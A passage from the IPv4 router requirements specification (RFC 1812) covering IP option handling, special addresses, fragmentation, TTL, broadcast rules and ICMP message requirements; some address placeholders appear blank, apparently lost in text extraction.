Classless Inter-Domain Routing (CIDR, defined in [INTERNET:15]).

Router implementors need not consider compliance with the section of
[INTRO:2] entitled "Internet Protocol -- IP," as that section is
entirely duplicated or superseded in this document. A router MUST be
compliant, and SHOULD be unconditionally compliant, with the
requirements of the section entitled "SPECIFIC ISSUES" relating to IP
in [INTRO:2].

In the following, the action specified in certain cases is to
silently discard a received datagram. This means that the datagram
will be discarded without further processing and that the router will
not send any ICMP error message (see Section [4.3]) as a result.
However, for diagnosis of problems a router SHOULD provide the
capability of logging the error (see Section [1.3.3]), including the
contents of the silently discarded datagram, and SHOULD count
datagrams discarded.

4.2.2 PROTOCOL WALK-THROUGH

RFC 791 [INTERNET:1] is the specification for the Internet Protocol.

4.2.2.1 Options: RFC 791 Section 3.2

In datagrams received by the router itself, the IP layer MUST
interpret IP options that it understands and preserve the rest
unchanged for use by higher layer protocols.

Higher layer protocols may require the ability to set IP options in
datagrams they send or examine IP options in datagrams they receive.
Later sections of this document discuss specific IP option support
required by higher layer protocols.

DISCUSSION
Neither this memo nor [INTRO:2] define the order in which a
receiver must process multiple options in the same IP header.
Hosts and routers originating datagrams containing multiple
options must be aware that this introduces an ambiguity in the
meaning of certain options when combined with a source-route
option.

Here are the requirements for specific IP options:

(a) Security Option

Some environments require the Security option in every packet
originated or received. Routers SHOULD IMPLEMENT the revised
security option described in [INTERNET:5].

DISCUSSION
Note that the security options described in [INTERNET:1] and RFC
1038 ([INTERNET:16]) are obsolete.

(b) Stream Identifier Option

This option is obsolete; routers SHOULD NOT place this option
in a datagram that the router originates. This option MUST be
ignored in datagrams received by the router.

(c) Source Route Options

A router MUST be able to act as the final destination of a
source route. If a router receives a packet containing a
completed source route, the packet has reached its final
destination. In such an option, the pointer points beyond the
last field and the destination address in the IP header

addresses the router. The option as received (the recorded
route) MUST be passed up to the transport layer (or to ICMP
message processing).

In the general case, a correct response to a source-routed
datagram traverses the same route. A router MUST provide a
means whereby transport protocols and applications can reverse
the source route in a received datagram. This reversed source
route MUST be inserted into datagrams they originate (see
[INTRO:2] for details) when the router is unaware of policy
constraints. However, if the router is policy aware, it MAY
select another path.

Some applications in the router MAY require that the user be
able to enter a source route.

A router MUST NOT originate a datagram containing multiple
source route options. What a router should do if asked to
forward a packet containing multiple source route options is
described in Section [5.2.4.1].

When a source route option is created (which would happen when
the router is originating a source routed datagram or is
inserting a source route option as a result of a special
filter), it MUST be correctly formed even if it is being
created by reversing a recorded route that erroneously includes
the source host (see case (B) in the discussion below).

DISCUSSION
Suppose a source routed datagram is to be routed from source _S to
destination D via routers G1, G2, Gn. Source S constructs a
datagram with G1's IP address as its destination address, and a
source route option to get the datagram the rest of the way to its
destination. However, there is an ambiguity in the specification
over whether the source route option in a datagram sent out by S
should be (A) or (B):

(A): {>>G2, G3, ... Gn, D} <--- CORRECT

(B): {S, >>G2, G3, ... Gn, D} <---- WRONG

(where >> represents the pointer). If (A) is sent, the datagram
received at D will contain the option: {G1, G2, ... Gn >>}, with S
and D as the IP source and destination addresses. If (B) were
sent, the datagram received at D would again contain S and D as
the same IP source and destination addresses, but the option would
be: {S, G1, ...Gn >>}; i.e., the originating host would be the
first hop in the route.

(d) Record Route Option

Routers MAY support the Record Route option in datagrams
originated by the router.

(e) Timestamp Option

Routers MAY support the timestamp option in datagrams
originated by the router. The following rules apply:

o When originating a datagram containing a Timestamp Option, a
router MUST record a timestamp in the option if

- Its Internet address fields are not pre-specified or
- Its first pre-specified address is the IP address of the
logical interface over which the datagram is being sent
(or the router's router-id if the datagram is being sent
over an unnumbered interface).

o If the router itself receives a datagram containing a
Timestamp Option, the router MUST insert the current time
into the Timestamp Option (if there is space in the option
to do so) before passing the option to the transport layer
or to ICMP for processing. If space is not present, the
router MUST increment the Overflow Count in the option.

o A timestamp value MUST follow the rules defined in [INTRO:2].

IMPLEMENTATION
To maximize the utility of the timestamps contained in the
timestamp option, the timestamp inserted should be, as nearly as
practical, the time at which the packet arrived at the router.
For datagrams originated by the router, the timestamp inserted
should be, as nearly as practical, the time at which the datagram
was passed to the Link Layer for transmission.

The timestamp option permits the use of a non-standard time clock,
but the use of a non-synchronized clock limits the utility of the
time stamp. Therefore, routers are well advised to implement the
Network Time Protocol for the purpose of synchronizing their
clocks.

4.2.2.2 Addresses in Options: RFC 791 Section 3.1

Routers are called upon to insert their address into Record Route,
Strict Source and Record Route, Loose Source and Record Route, or
Timestamp Options. When a router inserts its address into such an
option, it MUST use the IP address of the logical interface on which

the packet is being sent. Where this rule cannot be obeyed because
the output interface has no IP address (i.e., is an unnumbered
interface), the router MUST instead insert its router-id. The
router's router-id is one of the router's IP addresses. The Router
ID may be specified on a system basis or on a per-link basis. Which
of the router's addresses is used as the router-id MUST NOT change
(even across reboots) unless changed by the network manager.
Relevant management changes include reconfiguration of the router
such that the IP address used as the router-id ceases to be one of
the router's IP addresses. Routers with multiple unnumbered
interfaces MAY have multiple router-id's. Each unnumbered interface
MUST be associated with a particular router-id. This association
MUST NOT change (even across reboots) without reconfiguration of the
router.

DISCUSSION
This specification does not allow for routers that do not have at
least one IP address. We do not view this as a serious
limitation, since a router needs an IP address to meet the
manageability requirements of Chapter [8] even if the router is
connected only to point-to-point links.

IMPLEMENTATION

One possible method of choosing the router-id that fulfills this
requirement is to use the numerically smallest (or greatest) IP
address (treating the address as a 32-bit integer) that is
assigned to the router.

4.2.2.3 Unused IP Header Bits: RFC 791 Section 3.1

The IP header contains two reserved bits: one in the Type of Service
byte and the other in the Flags field. A router MUST NOT set either
of these bits to one in datagrams originated by the router. A router
MUST NOT drop (refuse to receive or forward) a packet merely because
one or more of these reserved bits has a non-zero value; i.e., the
router MUST NOT check the values of thes bits.

DISCUSSION
Future revisions to the IP protocol may make use of these unused
bits. These rules are intended to ensure that these revisions can
be deployed without having to simultaneously upgrade all routers
in the Internet.

4.2.2.4 Type of Service: RFC 791 Section 3.1

The Type-of-Service byte in the IP header is divided into three
sections: the Precedence field (high-order 3 bits), a field that is
customarily called Type of Service or TOS (next 4 bits), and a
reserved bit (the low order bit).

Rules governing the reserved bit were described in Section [4.2.2.3].

A more extensive discussion of the TOS field and its use can be found
in [ROUTE:11].

The description of the IP Precedence field is superseded by Section
[5.3.3]. RFC 795, Service Mappings, is obsolete and SHOULD NOT be
implemented.

4.2.2.5 Header Checksum: RFC 791 Section 3.1

As stated in Section [5.2.2], a router MUST verify the IP checksum of
any packet that is received, and MUST discard messages containing
invalid checksums. The router MUST NOT provide a means to disable
this checksum verification.

A router MAY use incremental IP header checksum updating when the
only change to the IP header is the time to live. This will reduce
the possibility of undetected corruption of the IP header by the
router. See [INTERNET:6] for a discussion of incrementally updating
the checksum.

IMPLEMENTATION
A more extensive description of the IP checksum, including
extensive implementation hints, can be found in [INTERNET:6] and
[INTERNET:7].

4.2.2.6 Unrecognized Header Options: RFC 791 Section 3.1

A router MUST ignore IP options which it does not recognize. A
corollary of this requirement is that a router MUST implement the End
of Option List option and the No Operation option, since neither
contains an explicit length.

DISCUSSION
All future IP options will include an explicit length.

4.2.2.7 Fragmentation: RFC 791 Section 3.2

Fragmentation, as described in [INTERNET:1], MUST be supported by a
router.

When a router fragments an IP datagram, it SHOULD minimize the number
of fragments. When a router fragments an IP datagram, it SHOULD send
the fragments in order. A fragmentation method that may generate one
IP fragment that is significantly smaller than the other MAY cause
the first IP fragment to be the smaller one.

DISCUSSION
There are several fragmentation techniques in common use in the
Internet. One involves splitting the IP datagram into IP
fragments with the first being MTU sized, and the others being
approximately the same size, smaller than the MTU. The reason for
this is twofold. The first IP fragment in the sequence will be
the effective MTU of the current path between the hosts, and the
following IP fragments are sized to minimize the further
fragmentation of the IP datagram. Another technique is to split
the IP datagram into MTU sized IP fragments, with the last
fragment being the only one smaller, as described in [INTERNET:1].

A common trick used by some implementations of TCP/IP is to
fragment an IP datagram into IP fragments that are no larger than
576 bytes when the IP datagram is to travel through a router.
This is intended to allow the resulting IP fragments to pass the
rest of the path without further fragmentation. This would,
though, create more of a load on the destination host, since it
would have a larger number of IP fragments to reassemble into one
IP datagram. It would also not be efficient on networks where the
MTU only changes once and stays much larger than 576 bytes.
Examples include LAN networks such as an IEEE 802.5 network with a
MTU of 2048 or an Ethernet network with an MTU of 1500).

One other fragmentation technique discussed was splitting the IP
datagram into approximately equal sized IP fragments, with the
size less than or equal to the next hop network's MTU. This is
intended to minimize the number of fragments that would result
from additional fragmentation further down the path, and assure
equal delay for each fragment.

Routers SHOULD generate the least possible number of IP fragments.

Work with slow machines leads us to believe that if it is
necessary to fragment messages, sending the small IP fragment
first maximizes the chance of a host with a slow interface of
receiving all the fragments.

4.2.2.8 Reassembly: RFC 791 Section 3.2

As specified in the corresponding section of [INTRO:2], a router MUST
support reassembly of datagrams that it delivers to itself.

4.2.2.9 Time to Live: RFC 791 Section 3.2

Time to Live (TTL) handling for packets originated or received by the
router is governed by [INTRO:2]; this section changes none of its
stipulations. However, since the remainder of the IP Protocol
section of [INTRO:2] is rewritten, this section is as well.

Note in particular that a router MUST NOT check the TTL of a packet
except when forwarding it.

A router MUST NOT originate or forward a datagram with a Time-to-Live
(TTL) value of zero.

A router MUST NOT discard a datagram just because it was received
with TTL equal to zero or one; if it is to the router and otherwise
valid, the router MUST attempt to receive it.

On messages the router originates, the IP layer MUST provide a means
for the transport layer to set the TTL field of every datagram that
is sent. When a fixed TTL value is used, it MUST be configurable.
The number SHOULD exceed the typical internet diameter, and current
wisdom suggests that it should exceed twice the internet diameter to
allow for growth. Current suggested values are normally posted in
the Assigned Numbers RFC. The TTL field has two functions: limit the
lifetime of TCP segments (see RFC 793 [TCP:1], p. 28), and terminate
Internet routing loops. Although TTL is a time in seconds, it also
has some attributes of a hop-count, since each router is required to
reduce the TTL field by at least one.

TTL expiration is intended to cause datagrams to be discarded by
routers, but not by the destination host. Hosts that act as routers
by forwarding datagrams must therefore follow the router's rules for
TTL.

A higher-layer protocol may want to set the TTL in order to implement
an "expanding scope" search for some Internet resource. This is used
by some diagnostic tools, and is expected to be useful for locating
the "nearest" server of a given class using IP multicasting, for
example. A particular transport protocol may also want to specify
its own TTL bound on maximum datagram lifetime.

A fixed default value must be at least big enough for the Internet
"diameter," i.e., the longest possible path. A reasonable value is

about twice the diameter, to allow for continued Internet growth. As
of this writing, messages crossing the United States frequently
traverse 15 to 20 routers; this argues for a default TTL value in
excess of 40, and 64 is a common value.

4.2.2.10 Multi-subnet Broadcasts: RFC 922

All-subnets broadcasts (called multi-subnet broadcasts in
[INTERNET:3]) have been deprecated. See Section [5.3.5.3].

4.2.2.11 Addressing: RFC 791 Section 3.2

As noted in 2.2.5.1, there are now five classes of IP addresses:
Class A through Class E. Class D addresses are used for IP
multicasting [INTERNET:4], while Class E addresses are reserved for
experimental use. The distinction between Class A, B, and C
addresses is no longer important; they are used as generalized
unicast network prefixes with only historical interest in their
class.

An IP multicast address is a 28-bit logical address that stands for a
group of hosts, and may be either permanent or transient. Permanent
multicast addresses are allocated by the Internet Assigned Number
Authority [INTRO:7], while transient addresses may be allocated
dynamically to transient groups. Group membership is determined
dynamically using IGMP [INTERNET:4].

We now summarize the important special cases for general purpose
unicast IP addresses, using the following notation for an IP address:

{ , }

and the notation -1 for a field that contains all 1 bits and the
notation 0 for a field that contains all 0 bits.

(a) { 0, 0 }

This host on this network. It MUST NOT be used as a source
address by routers, except the router MAY use this as a source
address as part of an initialization procedure (e.g., if the
router is using BOOTP to load its configuration information).

Incoming datagrams with a source address of { 0, 0 } which are
received for local delivery (see Section [5.2.3]), MUST be
accepted if the router implements the associated protocol and
that protocol clearly defines appropriate action to be taken.
Otherwise, a router MUST silently discard any locally-delivered
datagram whose source address is { 0, 0 }.

DISCUSSION
Some protocols define specific actions to take in response to a
received datagram whose source address is { 0, 0 }. Two examples
are BOOTP and ICMP Mask Request. The proper operation of these
protocols often depends on the ability to receive datagrams whose
source address is { 0, 0 }. For most protocols, however, it is
best to ignore datagrams having a source address of { 0, 0 } since
they were probably generated by a misconfigured host or router.
Thus, if a router knows how to deal with a given datagram having a
{ 0, 0 } source address, the router MUST accept it. Otherwise,
the router MUST discard it.

See also Section [4.2.3.1] for a non-standard use of { 0, 0 }.

(b) { 0, }

Specified host on this network. It MUST NOT be sent by routers
except that the router MAY use this as a source address as part
of an initialization procedure by which the it learns its own
IP address.

(c) { -1, -1 }

Limited broadcast. It MUST NOT be used as a source address.

A datagram with this destination address will be received by
every host and router on the connected physical network, but
will not be forwarded outside that network.

(d) { , -1 }

Directed Broadcast - a broadcast directed to the specified
network prefix. It MUST NOT be used as a source address. A
router MAY originate Network Directed Broadcast packets. A
router MUST receive Network Directed Broadcast packets; however
a router MAY have a configuration option to prevent reception
of these packets. Such an option MUST default to allowing
reception.

(e) { 127, }

Internal host loopback address. Addresses of this form MUST
NOT appear outside a host.

The is administratively assigned so that its value
will be unique in the routing domain to which the device is
connected.

IP addresses are not permitted to have the value 0 or -1 for the

or fields except in the special cases
listed above. This implies that each of these fields will be at
least two bits long.

DISCUSSION
Previous versions of this document also noted that subnet numbers
must be neither 0 nor -1, and must be at least two bits in length.
In a CIDR world, the subnet number is clearly an extension of the
network prefix and cannot be interpreted without the remainder of
the prefix. This restriction of subnet numbers is therefore
meaningless in view of CIDR and may be safely ignored.

For further discussion of broadcast addresses, see Section [4.2.3.1].

When a router originates any datagram, the IP source address MUST be
one of its own IP addresses (but not a broadcast or multicast
address). The only exception is during initialization.

For most purposes, a datagram addressed to a broadcast or multicast
destination is processed as if it had been addressed to one of the
router's IP addresses; that is to say:

o A router MUST receive and process normally any packets with a
broadcast destination address.

o A router MUST receive and process normally any packets sent to a
multicast destination address that the router has asked to
receive.

The term specific-destination address means the equivalent local IP
address of the host. The specific-destination address is defined to
be the destination address in the IP header unless the header
contains a broadcast or multicast address, in which case the
specific-destination is an IP address assigned to the physical
interface on which the datagram arrived.

A router MUST silently discard any received datagram containing an IP
source address that is invalid by the rules of this section. This
validation could be done either by the IP layer or (when appropriate)
by each protocol in the transport layer. As with any datagram a
router discards, the datagram discard SHOULD be counted.

DISCUSSION
A misaddressed datagram might be caused by a Link Layer broadcast
of a unicast datagram or by another router or host that is
confused or misconfigured.

4.2.3 SPECIFIC ISSUES

4.2.3.1 IP Broadcast Addresses

For historical reasons, there are a number of IP addresses (some
standard and some not) which are used to indicate that an IP packet
is an IP broadcast. A router

(1) MUST treat as IP broadcasts packets addressed to 255.255.255.255
or { , -1 }.

(2) SHOULD silently discard on receipt (i.e., do not even deliver to
applications in the router) any packet addressed to 0.0.0.0 or {

, 0 }. If these packets are not silently
discarded, they MUST be treated as IP broadcasts (see Section
[5.3.5]). There MAY be a configuration option to allow receipt
of these packets. This option SHOULD default to discarding
them.

(3) SHOULD (by default) use the limited broadcast address
(255.255.255.255) when originating an IP broadcast destined for
a connected (sub)network (except when sending an ICMP Address
Mask Reply, as discussed in Section [4.3.3.9]). A router MUST
receive limited broadcasts.

(4) SHOULD NOT originate datagrams addressed to 0.0.0.0 or {

, 0 }. There MAY be a configuration option to
allow generation of these packets (instead of using the relevant
1s format broadcast). This option SHOULD default to not
generating them.

DISCUSSION
In the second bullet, the router obviously cannot recognize
addresses of the form { , 0 } if the router has no
interface to that network prefix. In that case, the rules of the
second bullet do not apply because, from the point of view of the
router, the packet is not an IP broadcast packet.

4.2.3.2 IP Multicasting

An IP router SHOULD satisfy the Host Requirements with respect to IP
multicasting, as specified in [INTRO:2]. An IP router SHOULD support
local IP multicasting on all connected networks. When a mapping from
IP multicast addresses to link-layer addresses has been specified
(see the various IP-over-xxx specifications), it SHOULD use that
mapping, and MAY be configurable to use the link layer broadcast
instead. On point-to-point links and all other interfaces,
multicasts are encapsulated as link layer broadcasts. Support for

local IP multicasting includes originating multicast datagrams,
joining multicast groups and receiving multicast datagrams, and
leaving multicast groups. This implies support for all of
[INTERNET:4] including IGMP (see Section [4.4]).

DISCUSSION
Although [INTERNET:4] is entitled Host Extensions for IP
Multicasting, it applies to all IP systems, both hosts and
routers. In particular, since routers may join multicast groups,
it is correct for them to perform the host part of IGMP, reporting
their group memberships to any multicast routers that may be
present on their attached networks (whether or not they themselves
are multicast routers).

Some router protocols may specifically require support for IP
multicasting (e.g., OSPF [ROUTE:1]), or may recommend it (e.g.,
ICMP Router Discovery [INTERNET:13]).

4.2.3.3 Path MTU Discovery

To eliminate fragmentation or minimize it, it is desirable to know
what is the path MTU along the path from the source to destination.
The path MTU is the minimum of the MTUs of each hop in the path.
[INTERNET:14] describes a technique for dynamically discovering the
maximum transmission unit (MTU) of an arbitrary internet path. For a
path that passes through a router that does not support
[INTERNET:14], this technique might not discover the correct Path
MTU, but it will always choose a Path MTU as accurate as, and in many
cases more accurate than, the Path MTU that would be chosen by older
techniques or the current practice.

When a router is originating an IP datagram, it SHOULD use the scheme
described in [INTERNET:14] to limit the datagram's size. If the
router's route to the datagram's destination was learned from a
routing protocol that provides Path MTU information, the scheme
described in [INTERNET:14] is still used, but the Path MTU
information from the routing protocol SHOULD be used as the initial
guess as to the Path MTU and also as an upper bound on the Path MTU.

4.2.3.4 Subnetting

Under certain circumstances, it may be desirable to support subnets
of a particular network being interconnected only through a path that
is not part of the subnetted network. This is known as discontiguous
subnetwork support.

Routers MUST support discontiguous subnetworks.

IMPLEMENTATION
In classical IP networks, this was very difficult to achieve; in
CIDR networks, it is a natural by-product. Therefore, a router
SHOULD NOT make assumptions about subnet architecture, but SHOULD
treat each route as a generalized network prefix.

DISCUSSION The Internet has been growing at a tremendous rate of
late. This has been placing severe strains on the IP addressing
technology. A major factor in this strain is the strict IP
Address class boundaries. These make it difficult to efficiently
size network prefixes to their networks and aggregate several
network prefixes into a single route advertisement. By
eliminating the strict class boundaries of the IP address and
treating each route as a generalized network prefix, these strains
may be greatly reduced.

The technology for currently doing this is Classless Inter Domain
Routing (CIDR) [INTERNET:15].

For similar reasons, an address block associated with a given network
prefix could be subdivided into subblocks of different sizes, so that
the network prefixes associated with the subblocks would have
different length. For example, within a block whose network prefix
is 8 bits long, one subblock may have a 16 bit network prefix,
another may have an 18 bit network prefix, and a third a 14 bit
network prefix.

Routers MUST support variable length network prefixes in both their
interface configurations and their routing databases.

4.3 INTERNET CONTROL MESSAGE PROTOCOL - ICMP

4.3.1 INTRODUCTION

ICMP is an auxiliary protocol, which provides routing, diagnostic and
error functionality for IP. It is described in [INTERNET:8]. A
router MUST support ICMP.

ICMP messages are grouped in two classes that are discussed in the
following sections:

ICMP error messages:

Destination Unreachable Section 4.3.3.1
Redirect Section 4.3.3.2
Source Quench Section 4.3.3.3
Time Exceeded Section 4.3.3.4
Parameter Problem Section 4.3.3.5

ICMP query messages:
Echo Section 4.3.3.6
Information Section 4.3.3.7
Timestamp Section 4.3.3.8
Address Mask Section 4.3.3.9
Router Discovery Section 4.3.3.10

General ICMP requirements and discussion are in the next section.

4.3.2 GENERAL ISSUES

4.3.2.1 Unknown Message Types

If an ICMP message of unknown type is received, it MUST be passed to
the ICMP user interface (if the router has one) or silently discarded
(if the router does not have one).

4.3.2.2 ICMP Message TTL

When originating an ICMP message, the router MUST initialize the TTL.
The TTL for ICMP responses must not be taken from the packet that
triggered the response.

4.3.2.3 Original Message Header

Historically, every ICMP error message has included the Internet
header and at least the first 8 data bytes of the datagram that
triggered the error. This is no longer adequate, due to the use of
IP-in-IP tunneling and other technologies. Therefore, the ICMP
datagram SHOULD contain as much of the original datagram as possible
without the length of the ICMP datagram exceeding 576 bytes. The
returned IP header (and user data) MUST be identical to that which
was received, except that the router is not required to undo any
modifications to the IP header that are normally performed in
forwarding that were performed before the error was detected (e.g.,
decrementing the TTL, or updating options). Note that the
requirements of Section [4.3.3.5] supersede this requirement in some
cases (i.e., for a Parameter Problem message, if the problem is in a
modified field, the router must undo the modification). See Section
[4.3.3.5]).

4.3.2.4 ICMP Message Source Address

Except where this document specifies otherwise, the IP source address
in an ICMP message originated by the router MUST be one of the IP
addresses associated with the physical interface over which the ICMP
message is transmitted. If the interface has no IP addresses

associated with it, the router's router-id (see Section [5.2.5]) is
used instead.

4.3.2.5 TOS and Precedence

ICMP error messages SHOULD have their TOS bits set to the same value
as the TOS bits in the packet that provoked the sending of the ICMP
error message, unless setting them to that value would cause the ICMP
error message to be immediately discarded because it could not be
routed to its destination. Otherwise, ICMP error messages MUST be
sent with a normal (i.e., zero) TOS. An ICMP reply message SHOULD
have its TOS bits set to the same value as the TOS bits in the ICMP
request that provoked the reply.

ICMP Source Quench error messages, if sent at all, MUST have their IP
Precedence field set to the same value as the IP Precedence field in
the packet that provoked the sending of the ICMP Source Quench
message. All other ICMP error messages (Destination Unreachable,
Redirect, Time Exceeded, and Parameter Problem) SHOULD have their
precedence value set to 6 (INTERNETWORK CONTROL) or 7 (NETWORK
CONTROL). The IP Precedence value for these error messages MAY be
settable.

An ICMP reply message MUST have its IP Precedence field set to the
same value as the IP Precedence field in the ICMP request that
provoked the reply.

4.3.2.6 Source Route

If the packet which provokes the sending of an ICMP error message
contains a source route option, the ICMP error message SHOULD also
contain a source route option of the same type (strict or loose),
created by reversing the portion before the pointer of the route
recorded in the source route option of the original packet UNLESS the
ICMP error message is an ICMP Parameter Problem complaining about a
source route option in the original packet, or unless the router is
aware of policy that would prevent the delivery of the ICMP error
message.

DISCUSSION
In environments which use the U.S. Department of Defense security
option (defined in [INTERNET:5]), ICMP messages may need to
include a security option. Detailed information on this topic
should be available from the Defense Communications Agency.

4.3.2.7 When Not to Send ICMP Errors

An ICMP error message MUST NOT be sent as the result of receiving:

o An ICMP error message, or

o A packet which fails the IP header validation tests described in
Section [5.2.2] (except where that section specifically permits
the sending of an ICMP error message), or

o A packet destined to an IP broadcast or IP multicast address, or

o A packet sent as a Link Layer broadcast or multicast, or

o A packet whose source address has a network prefix of zero or is an
invalid source address (as defined in Section [5.3.7]), or

o Any fragment of a datagram other then the first fragment (i.e., a
packet for which the fragment offset in the IP header is nonzero).

Furthermore, an ICMP error message MUST NOT be sent in any case where
this memo states that a packet is to be silently discarded.

NOTE: THESE RESTRICTIONS TAKE PRECEDENCE OVER ANY REQUIREMENT
ELSEWHERE IN THIS DOCUMENT FOR SENDING ICMP ERROR MESSAGES.

DISCUSSION
These rules aim to prevent the broadcast storms that have resulted
from routers or hosts returning ICMP error messages in response to
broadcast packets. For example, a broadcast UDP packet to a non-
existent port could trigger a flood of ICMP Destination
Unreachable datagrams from all devices that do not have a client
for that destination port. On a large Ethernet, the resulting
collisions can render the network useless for a second or more.

Every packet that is broadcast on the connected network should
have a valid IP broadcast address as its IP destination (see
Section [5.3.4] and [INTRO:2]). However, some devices violate
this rule. To be certain to detect broadcast packets, therefore,
routers are required to check for a link-layer broadcast as well
as an IP-layer address.

IMPLEMENTATION+ This requires that the link layer inform the IP layer
when a link-layer broadcast packet has been received; see Section
[3.1].

4.3.2.8 Rate Limiting

A router which sends ICMP Source Quench messages MUST be able to
limit the rate at which the messages can be generated. A router
SHOULD also be able to limit the rate at which it sends other sorts
of ICMP error messages (Destination Unreachable, Redirect, Time
Exceeded, Parameter Problem). The rate limit parameters SHOULD be
settable as part of the configuration of the router. How the limits
are applied (e.g., per router or per interface) is left to the
implementor's discretion.

DISCUSSION
Two problems for a router sending ICMP error message are:
(1) The consumption of bandwidth on the reverse path, and
(2) The use of router resources (e.g., memory, CPU time)

To help solve these problems a router can limit the frequency with
which it generates ICMP error messages. For similar reasons, a
router may limit the frequency at which some other sorts of
messages, such as ICMP Echo Replies, are generated.

IMPLEMENTATION
Various mechanisms have been used or proposed for limiting the
rate at which ICMP messages are sent:

(1) Count-based - for example, send an ICMP error message for
every N dropped packets overall or per given source host.
This mechanism might be appropriate for ICMP Source Quench,
if used, but probably not for other types of ICMP messages.

(2) Timer-based - for example, send an ICMP error message to a
given source host or overall at most once per T milliseconds.

(3) Bandwidth-based - for example, limit the rate at which ICMP
messages are sent over a particular interface to some
fraction of the attached network's bandwidth.

4.3.3 SPECIFIC ISSUES

4.3.3.1 Destination Unreachable

If a router cannot forward a packet because it has no routes at all
(including no default route) to the destination specified in the
packet, then the router MUST generate a Destination Unreachable, Code
0 (Network Unreachable) ICMP message. If the router does have routes
to the destination network specified in the packet but the TOS
specified for the routes is neither the default TOS (0000) nor the
TOS of the packet that the router is attempting to route, then the

router MUST generate a Destination Unreachable, Code 11 (Network
Unreachable for TOS) ICMP message.

If a packet is to be forwarded to a host on a network that is
directly connected to the router (i.e., the router is the last-hop
router) and the router has ascertained that there is no path to the
destination host then the router MUST generate a Destination
Unreachable, Code 1 (Host Unreachable) ICMP message. If a packet is
to be forwarded to a host that is on a network that is directly
connected to the router and the router cannot forward the packet
because no route to the destination has a TOS that is either equal to
the TOS requested in the packet or is the default TOS (0000) then the
router MUST generate a Destination Unreachable, Code 12 (Host
Unreachable for TOS) ICMP message.

DISCUSSION
The intent is that a router generates the "generic" host/network
unreachable if it has no path at all (including default routes) to
the destination. If the router has one or more paths to the
destination, but none of those paths have an acceptable TOS, then
the router generates the "unreachable for TOS" message.

4.3.3.2 Redirect

The ICMP Redirect message is generated to inform a local host that it
should use a different next hop router for certain traffic.

Contrary to [INTRO:2], a router MAY ignore ICMP Redirects when
choosing a path for a packet originated by the router if the router
is running a routing protocol or if forwarding is enabled on the
router and on the interface over which the packet is being sent.

4.3.3.3 Source Quench

A router SHOULD NOT originate ICMP Source Quench messages. As
specified in Section [4.3.2], a router that does originate Source
Quench messages MUST be able to limit the rate at which they are
generated.

DISCUSSION
Research seems to suggest that Source Quench consumes network
bandwidth but is an ineffective (and unfair) antidote to
congestion. See, for example, [INTERNET:9] and [INTERNET:10].
Section [5.3.6] discusses the current thinking on how routers
ought to deal with overload and network congestion.

A router MAY ignore any ICMP Source Quench messages it receives.

DISCUSSION
A router itself may receive a Source Quench as the result of
originating a packet sent to another router or host. Such
datagrams might be, e.g., an EGP update sent to another router, or
a telnet stream sent to a host. A mechanism has been proposed
([INTERNET:11], [INTERNET:12]) to make the IP layer respond
directly to Source Quench by controlling the rate at which packets
are sent, however, this proposal is currently experimental and not
currently recommended.

4.3.3.4 Time Exceeded

When a router is forwarding a packet and the TTL field of the packet
is reduced to 0, the requirements of section [5.2.3.8] apply.

When the router is reassembling a packet that is destined for the
router, it is acting as an Internet host. [INTRO:2]'s reassembly
requirements therefore apply.

When the router receives (i.e., is destined for the router) a Time
Exceeded message, it MUST comply with [INTRO:2].

4.3.3.5 Parameter Problem

A router MUST generate a Parameter Problem message for any error not
specifically covered by another ICMP message. The IP header field or
IP option including the byte indicated by the pointer field MUST be
included unchanged in the IP header returned with this ICMP message.
Section [4.3.2] defines an exception to this requirement.

A new variant of the Parameter Problem message was defined in
[INTRO:2]:
Code 1 = required option is missing.

DISCUSSION
This variant is currently in use in the military community for a
missing security option.

4.3.3.6 Echo Request/Reply

A router MUST implement an ICMP Echo server function that receives
Echo Requests sent to the router, and sends corresponding Echo
Replies. A router MUST be prepared to receive, reassemble and echo
an ICMP Echo Request datagram at least as the maximum of 576 and the
MTUs of all the connected networks.

The Echo server function MAY choose not to respond to ICMP echo
requests addressed to IP broadcast or IP multicast addresses.

A router SHOULD have a configuration option that, if enabled, causes
the router to silently ignore all ICMP echo requests; if provided,
this option MUST default to allowing responses.

DISCUSSION
The neutral provision about responding to broadcast and multicast
Echo Requests derives from [INTRO:2]'s "Echo Request/Reply"
section.

As stated in Section [10.3.3], a router MUST also implement a
user/application-layer interface for sending an Echo Request and
receiving an Echo Reply, for diagnostic purposes. All ICMP Echo
Reply messages MUST be passed to this interface.

The IP source address in an ICMP Echo Reply MUST be the same as the
specific-destination address of the corresponding ICMP Echo Request
message.

Data received in an ICMP Echo Request MUST be entirely included in
the resulting Echo Reply.

If a Record Route and/or Timestamp option is received in an ICMP Echo
Request, this option (these options) SHOULD be updated to include the
current router and included in the IP header of the Echo Reply
message, without truncation. Thus, the recorded route will be for
the entire round trip.

If a Source Route option is received in an ICMP Echo Request, the
return route MUST be reversed and used as a Source Route option for
the Echo Reply message, unless the router is aware of policy that
would prevent the delivery of the message.

4.3.3.7 Information Request/Reply

A router SHOULD NOT originate or respond to these messages.

DISCUSSION
The Information Request/Reply pair was intended to support self-
configuring systems such as diskless workstations, to allow them
to discover their IP network prefixes at boot time. However,
these messages are now obsolete. The RARP and BOOTP protocols
provide better mechanisms for a host to discover its own IP
address.

4.3.3.8 Timestamp and Timestamp Reply

A router MAY implement Timestamp and Timestamp Reply. If they are
implemented then:

o The ICMP Timestamp server function MUST return a Timestamp Reply to
every Timestamp message that is received. It SHOULD be designed
for minimum variability in delay.

o An ICMP Timestamp Request message to an IP broadcast or IP
multicast address MAY be silently discarded.

o The IP source address in an ICMP Timestamp Reply MUST be the same
as the specific-destination address of the corresponding Timestamp
Request message.

o If a Source Route option is received in an ICMP Timestamp Request,
the return route MUST be reversed and used as a Source Route
option for the Timestamp Reply message, unless the router is aware
of policy that would prevent the delivery of the message.

o If a Record Route and/or Timestamp option is received in a
Timestamp Request, this (these) option(s) SHOULD be updated to
include the current router and included in the IP header of the
Timestamp Reply message.

o If the router provides an application-layer interface for sending
Timestamp Request messages then incoming Timestamp Reply messages
MUST be passed up to the ICMP user interface.

The preferred form for a timestamp value (the standard value) is
milliseconds since midnight, Universal Time. However, it may be
difficult to provide this value with millisecond resolution. For
example, many systems use clocks that update only at line frequency,
50 or 60 times per second. Therefore, some latitude is allowed in a
standard value:

(a) A standard value MUST be updated at least 16 times per second
(i.e., at most the six low-order bits of the value may be
undefined).

(b) The accuracy of a standard value MUST approximate that of
operator-set CPU clocks, i.e., correct within a few minutes.

IMPLEMENTATION
To meet the second condition, a router may need to query some time
server when the router is booted or restarted. It is recommended
that the UDP Time Server Protocol be used for this purpose. A
more advanced implementation would use the Network Time Protocol
